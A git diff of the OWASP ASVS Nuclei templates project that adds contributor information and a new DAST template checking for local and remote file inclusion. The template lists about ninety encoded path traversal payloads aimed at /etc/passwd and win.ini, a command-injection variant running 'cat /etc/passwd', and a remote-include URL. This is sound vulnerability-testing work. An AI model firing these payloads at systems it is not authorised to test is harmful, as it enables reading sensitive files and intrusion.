diff --git a/index.md b/index.md index 26fe70b..e02f35a 100644 --- a/index.md +++ b/index.md @@ -2,7 +2,7 @@ layout: col-sidebar title: OWASP ASVS Security Evaluation Templates with Nuclei -tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity +tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates ASVS asvs-evaluation PoC-generator vulnerablity automation WSTG pentest level: 2 type: tool pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites. @@ -32,3 +32,13 @@ This project aims to develop [Nuclei](https://github.com/projectdiscovery/nucle [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. + +## Contributing + +Contributions to this repository are welcome and encouraged. If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). + +For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md) + +#### Core Team +The project current core team are: +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index a71233a..31facb1 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -45,4 +45,4 @@ ssl: - type: json json: - " .tls_version" -# digest: 4b0a00483046022100ad668aabd5f22ba949265c214a22dd6393fc9d65118f5551704be20c9791b4fa022100a7d26f7b256f003b8db0d8794e22f7e63f051f5674b5ff4ed8a01b6cfa8787e3:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file +# digest: 4b0a00483046022100e28690ed9b4e02b2f1b32d3e5fea4266b8aea6d668d35365ed9e94ad9515ae8e022100e25e0fd48313f9be115c8f93bb91dc18ad74ebf1997576b72c99e810ac804570:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file diff --git a/templates/dast/5.3.9.yaml b/templates/dast/5.3.9.yaml new file mode 100644 index 0000000..d87880d --- /dev/null +++ b/templates/dast/5.3.9.yaml @@ -0,0 +1,144 @@ +id: ASVS-4-0-3-V5-3-9 + +info: + name: ASVS 5.3.9 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-829 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/ + - https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/ + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion + tags: asvs,5.3.9 + description: | + Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks. + metadata: + max-request: 90 + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + LFI-RFI: + # LFI (Linux) + - '/etc/passwd' + - '../etc/passwd' + - '../../etc/passwd' + - '../../../etc/passwd' + - '/../../../../etc/passwd' + - '../../../../../../../../../etc/passwd' + - '../../../../../../../../etc/passwd' + - '../../../../../../../etc/passwd' + - '../../../../../../etc/passwd' + - '../../../../../etc/passwd' + - '../../../../etc/passwd' + - '../../../etc/passwd' + - '../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd' + - '/../../../../../../../../../../etc/passwd^^' + - '/../../../../../../../../../../etc/passwd' + - '/./././././././././././etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '/..\../..\../..\../..\../..\../..\../etc/passwd' + - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '%252e%252e%252fetc%252fpasswd' + - '%252e%252e%252fetc%252fpasswd%00' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' + - '....//....//etc/passwd' + - '..///////..////..//////etc/passwd' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' + - '%0a/bin/cat%20/etc/passwd' + - '%00/etc/passwd%00' + - '%00../../../../../../etc/passwd' + - '/../../../../../../../../../../../etc/passwd%00.jpg' + - '/../../../../../../../../../../../etc/passwd%00.html' + - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' + - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '\\'/bin/cat%20/etc/passwd\\'' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + # LFI (Windows) + - '\WINDOWS\win.ini' + - '../../windows/win.ini' + - '....//....//windows/win.ini' + - '../../../../../windows/win.ini' + - '/..///////..////..//////windows/win.ini' + - '/../../../../../../../../../windows/win.ini' + - './../../../../../../../../../../windows/win.ini' + - '..%2f..%2f..%2f..%2fwindows/win.ini' + - '\WINDOWS\win.ini%00' + - '\WINNT\win.ini' + - '\WINNT\win.ini%00' + - 'windows/win.ini%00' + - '/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '/....\....\....\....\....\....\....\....\....\windows\win.ini' + - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' + - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' + - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' + - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' + - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' + - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' + - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' + - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' + - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' + - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' + - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' + # RFI + - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt" + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{LFI-RFI}}' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: body + words: + - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" +# digest: 4b0a00483046022100b3629f17d8650d25acbacc2d85fae5ad2c1cecf14c89bb28701ce2c7011ffe05022100a6db4746322beb7989b39c1b04fb416b31f02ac55a9690507e46a62ae93f2ac5:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file